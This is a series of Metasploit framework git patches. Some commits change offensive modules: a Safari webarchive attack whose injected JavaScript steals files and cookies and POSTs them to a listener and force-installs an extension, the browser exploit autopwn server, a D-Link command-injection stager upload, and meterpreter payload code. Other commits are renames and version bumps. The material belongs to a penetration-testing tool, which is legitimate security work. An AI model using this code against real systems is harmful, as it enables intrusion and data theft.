diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
index b43fdb3ee8..572625812b 100644
--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -38,7 +38,7 @@ module Payload::Windows::ReverseWinHttp_x64
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
     else
-    # Otherwise default to small URIs
+      # Otherwise default to small URIs
       conf[:url]              = generate_small_uri
     end
 

From b577f798458f6d39e9c94296bb7ae6a1ff6e857c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sun, 5 Jul 2015 16:46:18 -0500
Subject: [PATCH 0654/1013] Fix some bugs in the safari file navigation module.

---
 lib/msf/core/format/webarchive.rb             | 45 +++++++------------
 .../gather/safari_file_url_navigation.rb      | 10 ++---
 2 files changed, 20 insertions(+), 35 deletions(-)

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
index 0db288073d..2d07bfff55 100644
--- a/lib/msf/core/format/webarchive.rb
+++ b/lib/msf/core/format/webarchive.rb
@@ -91,24 +91,8 @@ module Webarchive
   # @return [String] mark up for embedding the iframes for each URL in a place that is
   #   invisible to the user
   def iframes_container_html
-    hidden_style = "position:fixed; left:-600px; top:-600px;"
     wrap_with_doc do
-      communication_js + injected_js_helpers + steal_files + install_extension + message
-    end
-  end
-
-  # @return [String] javascript code, wrapped in script tags, that is inserted into the
-  #   WebMainResource (parent) frame so that child frames can communicate "up" to the parent
-  #   and send data out to the listener
-  def communication_js
-    wrap_with_script do
-      %Q|
-        window.addEventListener('message', function(event){
-          var x = new XMLHttpRequest;
-          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
-          x.send(event.data);
-        });
-      |
+      injected_js_helpers + steal_files + install_extension + message
     end
   end
 
@@ -122,23 +106,20 @@ module Webarchive
     raise "EXTENSION_ID datastore option missing" unless datastore['EXTENSION_ID'].present?
     wrap_with_script do
       %Q|
+      var qq = null;
       var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
       var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
 
       function go(){
         window.focus();
-        window.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', 'x')
+        qq.open('javascript:safari&&(safari.installExtension\|\|(window.top.location.href.match(/extensions/)&&window.top.location.reload(false)))&&(safari.installExtension("'+extID+'", "'+extURL+'"), window.close());', '_self');
       }
-      if (!window.x){
-        alert(1);
-        window.onclick = function(){
-          x = window.open('#{apple_extension_url}', 'x');
-          setInterval(go, 400);
-        };
-      } else {
-        setInterval(go, 400);
-      }
-
+      window.addEventListener('message', function(e) {
+        if (!qq && e.data === 'EXT') {
+          qq = e.source;
+          setInterval(go, 3000);
+        }
+      });
       |
     end
   end
@@ -327,7 +308,11 @@ function reportStolenCookies() {
         window.sendData = function(key, val) {
           var data = {};
           data[key] = val;
-          window.top.postMessage(JSON.stringify(data), "*")
+
+          var x = new XMLHttpRequest;
+          x.open('POST', '#{backend_url}#{collect_data_uri}', true);
+          x.setRequestHeader('Content-type', 'text/plain')
+          x.send(JSON.stringify(data));
         };
       |
     end
@@ -355,7 +340,7 @@ function reportStolenCookies() {
 
   # @return [String] HTML content that is rendered in the <body> of the webarchive.
   def message
-    "<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
+    "<p>You are being redirected.</p>"
   end
 
   # @return [Array<String>] of URLs provided by the user
diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb
index 516eb32987..44e556096d 100644
--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -63,12 +63,12 @@ class Metasploit3 < Msf::Auxiliary
       begin
         data = JSON::parse(data_str || '')
         file = record_data(data, cli)
-        send_response_html(cli, '')
+        send_response(cli, '')
         print_good "data #{data.keys.join(',')} received and stored to #{file}"
       rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
         file = record_data(data_str, cli)
         print_error "Invalid JSON stored in #{file}"
-        send_response_html(cli, '')
+        send_response(cli, '')
       end
     elsif req.uri =~ /#{popup_path}$/
       send_response(cli, 200, 'OK', popup_html)
@@ -131,8 +131,7 @@ class Metasploit3 < Msf::Auxiliary
         },
         function() { opener.location = 'about:blank'; },
         function() { opener.history.back(); },
-        function() { },
-        function() { window.location = '#{apple_extension_url}'; }
+        function() { if (#{datastore['INSTALL_EXTENSION']}) { opener.postMessage('EXT', '*'); window.location = '#{apple_extension_url}'; } else { window.close(); } }
       )
 
      </script>
@@ -317,7 +316,8 @@ class Metasploit3 < Msf::Auxiliary
   # @param [Hash] data the data to store in the log
   # @return [String] filename where we are storing the data
   def record_data(data, cli)
-    file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+    name = if data.is_a?(Hash) then data.keys.first else 'data' end
+    file = File.basename(name).gsub(/[^A-Za-z]/,'')
     store_loot(
       file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
     )

From 60a896f58bedad39d13381b4cac0976d2296075c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sun, 5 Jul 2015 16:48:25 -0500
Subject: [PATCH 0655/1013] Adjust extension timeout.

---
 lib/msf/core/format/webarchive.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
index 2d07bfff55..7a8c3e79c9 100644
--- a/lib/msf/core/format/webarchive.rb
+++ b/lib/msf/core/format/webarchive.rb
@@ -117,7 +117,7 @@ module Webarchive
       window.addEventListener('message', function(e) {
         if (!qq && e.data === 'EXT') {
           qq = e.source;
-          setInterval(go, 3000);
+          setInterval(go, 600);
         }
       });
       |

From d2063c92e167fccd6b74ed912115cf3726e1ed5f Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 5 Jul 2015 18:21:45 -0500
Subject: [PATCH 0656/1013] Refactor datastore names to match standards

---
 lib/msf/core/exploit/browser_autopwnv2.rb    | 31 ++++++++++----------
 modules/auxiliary/server/browser_autopwn2.rb | 19 ++++++------
 scripts/resource/bap_all.rc                  |  2 +-
 scripts/resource/bap_dryrun_only.rc          |  6 ++--
 scripts/resource/bap_firefox_only.rc         |  4 +--
 scripts/resource/bap_flash_only.rc           |  4 +--
 scripts/resource/bap_ie_only.rc              |  4 +--
 7 files changed, 36 insertions(+), 34 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 6ece1bd36d..deb961545e 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -54,8 +54,8 @@ module Msf
         next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
 
         # The user gets to specify which modules to include/exclude
-        next if datastore['Include'] && fullname !~ datastore['Include']
-        next if datastore['Exclude'] && fullname =~ datastore['Exclude']
+        next if datastore['INCLUDE_PATTERN'] && fullname !~ datastore['INCLUDE_PATTERN']
+        next if datastore['EXCLUDE_PATTERN'] && fullname =~ datastore['EXCLUDE_PATTERN']
 
         mod = framework.exploits.create(fullname)
         unless mod
@@ -248,7 +248,7 @@ module Msf
       @bap_exploits = []
       bap_groups.each_pair do |ranking, module_list|
         module_list.each do |m|
-          break if @bap_exploits.length >= datastore['MaxExploits']
+          break if @bap_exploits.length >= datastore['MaxExploitCount']
           @bap_exploits << m
         end
       end
@@ -301,7 +301,7 @@ module Msf
     # @return [void]
     def start_payload_listeners
       # Spawn nothing if the user doesn't want to pop sessions.
-      return if datastore['MaxSessions'] == 0
+      return if datastore['MaxSessionCount'] == 0
 
       # Don't repeat launching payload handlers
       wanted_payloads.uniq! { |e| e[:payload_name] }
@@ -469,7 +469,7 @@ module Msf
       @wanted_payloads = []
 
       # #split might be expensive if the file is really big
-      @whitelist = datastore['Whitelist'] ? datastore['Whitelist'].split : nil
+      @whitelist = datastore['AllowedAddresses'] ? datastore['AllowedAddresses'].split : nil
 
       print_status("Searching BES exploits, please wait...")
       init_exploits
@@ -603,8 +603,8 @@ module Msf
         end
       end
 
-      if datastore['RealList']
-        show_real_list(cli.peerhost, tag, current_exploit_list)
+      if datastore['ShowExploitList']
+        show_exploit_list(cli.peerhost, tag, current_exploit_list)
       end
 
       current_exploit_list
@@ -630,7 +630,7 @@ module Msf
     # @see #sort_bap_exploits Explains how the exploit list is generated at first.
     # @see #get_suitable_exploits Explains how we serve exploits to each client.
     # @return [void]
-    def show_real_list(ip, tag, current_exploit_list)
+    def show_exploit_list(ip, tag, current_exploit_list)
       order = 1
       table = Rex::Ui::Text::Table.new(
         'Header'  => '',
@@ -711,6 +711,7 @@ module Msf
     #
     # @return [Fixnum] A session count.
     def session_count
+      # TODO: Restrict these to the active workspace
       total = 0
 
       payload_job_ids.each do |id|
@@ -737,21 +738,21 @@ module Msf
     def build_html(cli, request)
       exploit_list = get_exploit_urls(cli, request)
 
-      if datastore['MaxSessions'] > -1 && session_count >= datastore['MaxSessions']
-        print_status("Exploits will not be served because you've reached the max session count of #{datastore['MaxSessions']}")
-        if datastore['Content'].blank?
+      if datastore['MaxSessionCount'] > -1 && session_count >= datastore['MaxSessionCount']
+        print_status("Exploits will not be served because you've reached the max session count of #{datastore['MaxSessionCount']}")
+        if datastore['HTMLContent'].blank?
           send_not_found(cli)
           return ''
         else
-          return datastore['Content']
+          return datastore['HTMLContent']
         end
       elsif exploit_list.empty?
         print_status("No suitable exploits to send.")
-        if datastore['Content'].blank?
+        if datastore['HTMLContent'].blank?
           send_not_found(cli)
           return ''
         else
-          return datastore['Content']
+          return datastore['HTMLContent']
         end
       end
 
@@ -807,7 +808,7 @@ module Msf
       <body>
       </body>
       </html>
-      #{datastore['Content']}|
+      #{datastore['HTMLContent']}|
     end
 
   end
diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 1a09d7f176..95a70337ee 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -72,16 +72,17 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
-        OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
-        OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),
-        OptString.new('Content', [false, 'HTML Content', '']),
-        OptAddressRange.new('Whitelist', [false, "A range of IPs you're interested in attacking"]),
-        OptInt.new('MaxSessions', [false, 'Number of sessions to get', -1]),
-        OptBool.new('RealList', [true, "Show which exploits will actually be served to each client", false])
-      ] ,self.class)
+        OptRegexp.new('INCLUDE_PATTERN', [false, 'Pattern search to include specific modules']),
+        OptRegexp.new('EXCLUDE_PATTERN', [false, 'Pattern search to exclude specific modules'])
+      ], self.class)
 
-    deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
+    register_advanced_options([
+        OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 20]),
+        OptString.new('HTMLContent', [false, 'HTML Content', '']),
+        OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]),
+        OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]),
+        OptBool.new('ShowExploitList', [true, "Show which exploits will actually be served to each client", false])
+      ] ,self.class)
   end
 
   def get_advanced_options
diff --git a/scripts/resource/bap_all.rc b/scripts/resource/bap_all.rc
index 53b88fc334..6f17d516f5 100644
--- a/scripts/resource/bap_all.rc
+++ b/scripts/resource/bap_all.rc
@@ -1,6 +1,6 @@
 <ruby>
 run_single("use auxiliary/server/browser_autopwn2")
-run_single("set RealList true")
+run_single("set ShowExploitList true")
 run_single("set VERBOSE true")
 run_single("run")
 </ruby>
diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
index 8b4d206dde..a8e6299d81 100644
--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -3,14 +3,14 @@ print_status("Starting BAP...")
 print_status("Exploits will not be actually served, but you will know which ones the clients might be vulnerable to.")
 print_status("You can do 'notes -t baps.clicks' in msfconsole to track clicks and client-specific exploit info.")
 run_single("use auxiliary/server/browser_autopwn2")
-run_single("set RealList true")
-run_single("set MaxSessions 0")
+run_single("set ShowExploitList true")
+run_single("set MaxSessionCount 0")
 
 # Instead of set Content, you can also do set Custom404 to redirect the client to an SE training website
 # For example (why don't you try this? :-) )
 # run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
 
-run_single("set Content \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
+run_single("set HTMLContent \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
 
 run_single("run")
 </ruby>
diff --git a/scripts/resource/bap_firefox_only.rc b/scripts/resource/bap_firefox_only.rc
index d48f064d73..63b4e03f7d 100644
--- a/scripts/resource/bap_firefox_only.rc
+++ b/scripts/resource/bap_firefox_only.rc
@@ -2,7 +2,7 @@
 print_status("Starting Browser Autopwn with Firefox-only BrowserExploitServer-based exploits.")
 print_status("Older Firefox exploits don't use BES, therefore will not be loaded.")
 run_single("use auxiliary/server/browser_autopwn2")
-run_single("set Include (mozilla_firefox|firefox)_")
-run_single("set RealList true")
+run_single("set INCLUDE_PATTERN (mozilla_firefox|firefox)_")
+run_single("set ShowExploitList true")
 run_single("run")
 </ruby>
diff --git a/scripts/resource/bap_flash_only.rc b/scripts/resource/bap_flash_only.rc
index c7cb25d4d2..23258602ab 100644
--- a/scripts/resource/bap_flash_only.rc
+++ b/scripts/resource/bap_flash_only.rc
@@ -2,7 +2,7 @@
 print_status("Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits.")
 print_status("Older Adobe Flash exploits don't use BES, therefore will not be loaded.")
 run_single("use auxiliary/server/browser_autopwn2")
-run_single("set Include adobe_flash")
-run_single("set RealList true")
+run_single("set INCLUDE_PATTERN adobe_flash")
+run_single("set ShowExploitList true")
 run_single("run")
 </ruby>
diff --git a/scripts/resource/bap_ie_only.rc b/scripts/resource/bap_ie_only.rc
index 56840c5cbd..0e31ebf867 100644
--- a/scripts/resource/bap_ie_only.rc
+++ b/scripts/resource/bap_ie_only.rc
@@ -2,7 +2,7 @@
 print_status("Starting Browser Autopwn with IE-only BrowserExploitServer-based exploits.")
 print_status("Older IE exploits don't use BES, therefore will not be loaded.")
 run_single("use auxiliary/server/browser_autopwn2")
-run_single("set Include (ms\\\\d\\\\d_\\\\d+|ie)_")
-run_single("set RealList true")
+run_single("set INCLUDE_PATTERN (ms\\\\d\\\\d_\\\\d+|ie)_")
+run_single("set ShowExploitList true")
 run_single("run")
 </ruby>

From 31505496341dbef693dfe5c1a0bed8b9ac76b2fc Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 5 Jul 2015 19:07:10 -0500
Subject: [PATCH 0657/1013] Experimental output show/hide for BAPv2

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 27 ++++++++++++++++++-----
 1 file changed, 22 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index deb961545e..a75b95cf02 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -63,7 +63,6 @@ module Msf
           next
         end
         if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
-
           @bap_exploits << mod
         end
       end
@@ -109,6 +108,7 @@ module Msf
     # @return [void]
     def cleanup
       super
+      configure_job_output(false)
       clear_browser_profiles
       rm_exploit_jobs
       rm_payload_jobs
@@ -337,8 +337,8 @@ module Msf
 
         # Now we're ready to start the handler
         multi_handler.exploit_simple(
-          'LocalInput' => self.user_input,
-          'LocalOutput' => self.user_output,
+          'LocalInput' => nil,
+          'LocalOutput' => nil,
           'Payload' => payload_name,
           'RunAsJob' => true
         )
@@ -443,8 +443,8 @@ module Msf
       bap_exploits.each do |m|
         set_exploit_options(m)
         m.exploit_simple(
-          'LocalInput'  => self.user_input,
-          'LocalOutput' => self.user_output,
+          'LocalInput'  => nil,
+          'LocalOutput' => nil,
           'Target'      => 0,
           'Payload'     => m.datastore['PAYLOAD'],
           'RunAsJob'    => true
@@ -483,6 +483,23 @@ module Msf
 
       t2 = Time.now
       print_status("Time spent: #{(t2-t1).inspect}")
+
+      configure_job_output(true)
+    end
+
+    # Configures the output of sub-jobs
+    #
+    # @return [void]
+    def configure_job_output(on=true)
+      (@exploit_job_ids + @payload_job_ids).each do |jid|
+        job = framework.jobs[jid.to_s]
+        next unless job
+        job.ctx.each do |m|
+          next unless m.respond_to? :user_output
+          m.user_output = on ? self.user_output : nil
+          break
+        end
+      end
     end
 
 

From a9edfa1b4b44a80afac3080741796b85ee4606b9 Mon Sep 17 00:00:00 2001
From: Donny Maasland <donny.maasland@fox-it.com>
Date: Mon, 6 Jul 2015 13:37:36 +0200
Subject: [PATCH 0658/1013] Fix a small typo

---
 modules/auxiliary/gather/impersonate_ssl.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb
index 5177cb5384..d6e084f9dd 100644
--- a/modules/auxiliary/gather/impersonate_ssl.rb
+++ b/modules/auxiliary/gather/impersonate_ssl.rb
@@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary
 
     register_advanced_options(
       [
-        OptBool.new('AlterSerial',        [false, "Alter the serial number slightly to avoif FireFox serial matching", true])
+        OptBool.new('AlterSerial',        [false, "Alter the serial number slightly to avoid FireFox serial matching", true])
       ], self.class)
   end
 

From 5b6ceff339db23b06d0adc4218aa2da248c72627 Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Mon, 6 Jul 2015 15:00:12 +0200
Subject: [PATCH 0659/1013] mime message

---
 .../http/dlink_dspw110_cookie_noauth_exec.rb  | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
index ae3358f0db..62e71fd341 100644
--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
     @counter = 1
     execute_cmdstager(
       :flavor  => :echo,
-      :linemax => 99  #limited by our upload, larger payloads crash the web server
+      :linemax => 95  #limited by our upload, larger payloads crash the web server
     )
 
     print_status("#{peer} - creating payload and executing it ...")
@@ -108,12 +108,13 @@ class Metasploit3 < Msf::Exploit::Remote
     #upload our stager to a shell script
     #upload takes quite long because there is no response from the web server
 
-    data_cmd = "------------------------------9bcdb049f0d2\r\n"
-    data_cmd << "Content-Disposition: form-data; name=\"name\"; filename=\"#{@counter}\"\r\n"
-    data_cmd << "Content-Type: application/octet-stream\r\n\r\n"
-    data_cmd << "#!/bin/sh\n"
-    data_cmd << cmd
-    data_cmd << "\n------------------------------9bcdb049f0d2--"
+    file_upload = "#!/bin/sh\n"
+    file_upload << cmd << "\n"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"xxx\"; filename=\"#{@counter}\"")
+    post_data.bound = "-9bcdb049f0d2--"
+    file = post_data.to_s
 
     @counter = @counter + 1
 
@@ -121,8 +122,8 @@ class Metasploit3 < Msf::Exploit::Remote
       send_request_cgi({
         'method'        => 'POST',
         'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
-        'ctype'         => "multipart/form-data; boundary=----------------------------9bcdb049f0d2",
-        'data'          => data_cmd
+        'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
+        'data'          => file
       })
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
@@ -131,6 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_final_command(cmd)
+    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({
         'method'        => 'GET',

From 2a89e248d7af7a7edb53bc12e0966faf25263508 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 6 Jul 2015 11:20:34 -0400
Subject: [PATCH 0660/1013] Pymet fix send uuid logic for Python 3.x

---
 data/meterpreter/meterpreter.py               | 5 +++--
 lib/msf/core/payload/python/send_uuid.rb      | 6 ++++--
 modules/payloads/stages/python/meterpreter.rb | 4 ++--
 3 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 61aeb7db7d..11847bc36b 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -1,5 +1,6 @@
 #!/usr/bin/python
 # vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
+import binascii
 import code
 import os
 import platform
@@ -66,7 +67,7 @@ DEBUGGING = False
 HTTP_CONNECTION_URL = None
 HTTP_PROXY = None
 HTTP_USER_AGENT = None
-PAYLOAD_UUID = ""
+PAYLOAD_UUID = ''
 SESSION_COMMUNICATION_TIMEOUT = 300
 SESSION_EXPIRATION_TIMEOUT = 604800
 SESSION_RETRY_TOTAL = 3600
@@ -807,7 +808,7 @@ class PythonMeterpreter(object):
 		self.send_packet(pkt)
 
 	def _core_uuid(self, request, response):
-		response += tlv_pack(TLV_TYPE_UUID, PAYLOAD_UUID)
+		response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
 		return ERROR_SUCCESS, response
 
 	def _core_enumextcmd(self, request, response):
diff --git a/lib/msf/core/payload/python/send_uuid.rb b/lib/msf/core/payload/python/send_uuid.rb
index 2e48b7dbf0..cae6b2e84d 100644
--- a/lib/msf/core/payload/python/send_uuid.rb
+++ b/lib/msf/core/payload/python/send_uuid.rb
@@ -21,9 +21,11 @@ module Payload::Python::SendUUID
     sock_var = opts[:sock_var] || 's'
 
     uuid = opts[:uuid] || generate_payload_uuid
-    uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
+    uuid_hex = Rex::Text.to_hex(uuid.to_raw, prefix = '')
 
-    "#{sock_var}.send(\"#{uuid_raw}\")\n"
+    uuid_stub = "import binascii\n"
+    uuid_stub << "#{sock_var}.send(binascii.a2b_hex('#{uuid_hex}'))\n"
+    uuid_stub
   end
 
 end
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index 3cbd9e7a52..a908ff6276 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -43,8 +43,8 @@ module Metasploit3
     met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
 
     uuid = opts[:uuid] || generate_payload_uuid
-    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
-    met = met.sub("PAYLOAD_UUID = \"\"", "PAYLOAD_UUID = \"#{bytes}\"")
+    uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
+    met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
 
     met
   end

From 174c90ccdebb64037f097cc6cbbd46c6b35dbd81 Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Mon, 6 Jul 2015 10:28:34 -0500
Subject: [PATCH 0661/1013] Updating version to match current

* This will be changed to the most recent git hash for next round,
at least making accurate for now.
---
 lib/metasploit/framework/version.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 4591fdc847..1997dee21a 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -3,7 +3,7 @@ module Metasploit
     module Version
       MAJOR = 4
       MINOR = 11
-      PATCH = 0
+      PATCH = 3
       PRERELEASE = 'dev'
     end
 

From 653c4808b20d9753290fd3d405fc5cc07d1a1c63 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 6 Jul 2015 10:42:48 -0500
Subject: [PATCH 0662/1013] update framework version spec

---
 Gemfile.lock                        | 10 +++++-----
 spec/lib/msf/core/framework_spec.rb |  2 +-
 2 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 4d140dec18..219a800392 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.11.0.pre.dev)
+    metasploit-framework (4.11.3.pre.dev)
       actionpack (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       bcrypt
@@ -20,14 +20,14 @@ PATH
       rubyzip (~> 1.1)
       sqlite3
       tzinfo
-    metasploit-framework-db (4.11.0.pre.dev)
+    metasploit-framework-db (4.11.3.pre.dev)
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (= 1.0.0)
-      metasploit-framework (= 4.11.0.pre.dev)
+      metasploit-framework (= 4.11.3.pre.dev)
       metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
-    metasploit-framework-pcap (4.11.0.pre.dev)
-      metasploit-framework (= 4.11.0.pre.dev)
+    metasploit-framework-pcap (4.11.3.pre.dev)
+      metasploit-framework (= 4.11.3.pre.dev)
       network_interface (~> 0.0.1)
       pcaprub
 
diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb
index 3cecd9d026..4786a8508a 100644
--- a/spec/lib/msf/core/framework_spec.rb
+++ b/spec/lib/msf/core/framework_spec.rb
@@ -17,7 +17,7 @@ describe Msf::Framework do
   end
 
   describe "#version" do
-    CURRENT_VERSION = "4.11.0-dev"
+    CURRENT_VERSION = "4.11.3-dev"
 
     subject(:framework) do
       described_class.new

From 3595a23673e92b7eb58f1e61aa7447bfb0cdbbf0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 6 Jul 2015 11:17:58 -0500
Subject: [PATCH 0663/1013] Restore #3738

---
 lib/msf/core/exploit/smb/server.rb | 95 ++++++++++++++++++++++++++++--
 1 file changed, 90 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/smb/server.rb b/lib/msf/core/exploit/smb/server.rb
index 3efb46ff57..2cede3c66f 100644
--- a/lib/msf/core/exploit/smb/server.rb
+++ b/lib/msf/core/exploit/smb/server.rb
@@ -18,8 +18,18 @@ module Msf
         deregister_options('SSL', 'SSLCert')
         register_options(
           [
-            OptPort.new('SRVPORT', [ true, "The local port to listen on.", 445 ])
+            OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 445 ])
           ], self.class)
+
+        register_advanced_options(
+          [
+            OptInt.new('SMBServerMaximumBuffer', [ true, 'The maximum number of data in megabytes to buffer', 2 ]),
+            OptInt.new('SMBServerIdleTimeout', [ true, 'The maximum amount of time to keep an idle session open in seconds', 120 ])
+          ], self.class)
+
+        @smb_server_last_pool_sweep = Time.now.to_f
+        @smb_server_pool_mutex = Mutex.new
+        @smb_server_request_counter = 0
       end
 
       def setup
@@ -44,16 +54,58 @@ module Msf
 
       def smb_conn(c)
         @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport}
+        smb_pool_update(c)
       end
 
       def smb_stop(c)
+        # Make sure the socket is closed
+        begin
+          c.close
+            # Handle any number of errors that a double-close or failed shutdown can trigger
+        rescue ::IOError, ::EOFError,
+          ::Errno::ECONNRESET, ::Errno::ENOTCONN, ::Errno::ECONNABORTED,
+          ::Errno::ETIMEDOUT, ::Errno::ENETRESET, ::Errno::ESHUTDOWN
+        end
+
+        # Delete the state table entry
         @state.delete(c)
       end
 
       def smb_recv(c)
         smb = @state[c]
         smb[:data] ||= ''
-        smb[:data] << c.get_once
+
+        buff = ''
+        begin
+          buff = c.get_once(-1, 0.25)
+            # Handle any number of errors that a read can trigger depending on socket state
+        rescue ::IOError, ::EOFError,
+          ::Errno::ECONNRESET, ::Errno::ENOTCONN, ::Errno::ECONNABORTED,
+          ::Errno::ETIMEDOUT, ::Errno::ENETRESET, ::Errno::ESHUTDOWN
+          vprint_status("Dropping connection from #{smb[:name]} due to exception: #{$!.class} #{$!}")
+          smb_stop(c)
+          return
+        end
+
+        # The client said it had data, but lied, kill the session
+        unless buff and buff.length > 0
+          vprint_status("Dropping connection from #{smb[:name]} due to empty payload...")
+          smb_stop(c)
+          return
+        end
+
+        # Append the new data to the buffer
+        smb[:data] << buff
+
+        # Prevent a simplistic DoS if the buffer is too big
+        if smb[:data].length > (1024*1024*datastore['SMBServerMaximumBuffer'])
+          vprint_status("Dropping connection from #{smb[:name]} due to oversized buffer of #{smb[:data].length} bytes...")
+          smb_stop(c)
+          return
+        end
+
+        # Update the last-seen timestamp and purge old entries
+        smb_pool_update(c)
 
         while(smb[:data].length > 0)
 
